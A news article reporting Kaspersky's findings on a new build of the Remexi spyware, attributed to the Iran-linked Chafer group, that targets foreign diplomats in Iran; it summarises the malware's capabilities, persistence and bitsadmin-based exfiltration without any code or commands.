A newly uncovered spyware-slinging operation appears to have been targeting foreign diplomats in Iran for more than three years.
Researchers at Kaspersky Lab said this week that a new build of the Remexi software nasty, first seen in 2015, has been spotted lurking on multiple machines within Iran, mostly those located within what we assume are foreign embassy buildings. The Windows-targeting surveillance-ware was previously associated with a hacking group known as Chafer, and an examination of the latest strain suggests it is of Iranian origin.
"The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when possible," Kaspersky's Denis Legezo said of the infection.
"The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses standard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS) bitsadmin.exe to receive commands and exfiltrate data."
Curiously, Legezo said he does not yet know how the malware is spreading in the wild, just that it is targeting "foreign diplomatic entities" based within Iran.
"So far, our telemetry hasn’t provided any concrete evidence that shows us how the Remexi malware spread," we're told.
"However, we think it’s worth mentioning that for one victim we found a correlation between the execution of Remexi's main module and the execution of an AutoIt script compiled as PE, which we believe may have dropped the malware."
Baddies linked to Iran fingered for DNS hijacking' emailsREAD MORE
Once on a victim's machine, the spyware is very persistent, hiding out in scheduled tasks, Userinit and Run registry keys in the HKLM hive, depending on the version of Windows it has infected. Data is exfiltrated to command and control servers using Microsoft's bitsadmin.exe transfer utility.
According to timestamps in the malware, its development appears to have been completed in March 2018, though there are a few sections of the code that appear to be much older.
While the exact aim of the malware operation is unknown, Kaspersky researchers believe the attack is part of a domestic espionage campaign that seeks to keep an eye on the activity of foreign diplomats in the renegade Mid-East nation. In addition to targeting foreign embassies, researchers pointed to clues such as the use of Farsi language in encryption keys that suggest Iranian operatives are behind the attack.
Iran has been listed as one of the countries that has been particularly active in its online espionage operations of late. While the regime uses its malware for such things as espionage and surveillance, Iranian groups have gained a reputation for largely focusing on social media campaigns that aim to advance the country's political interests. ®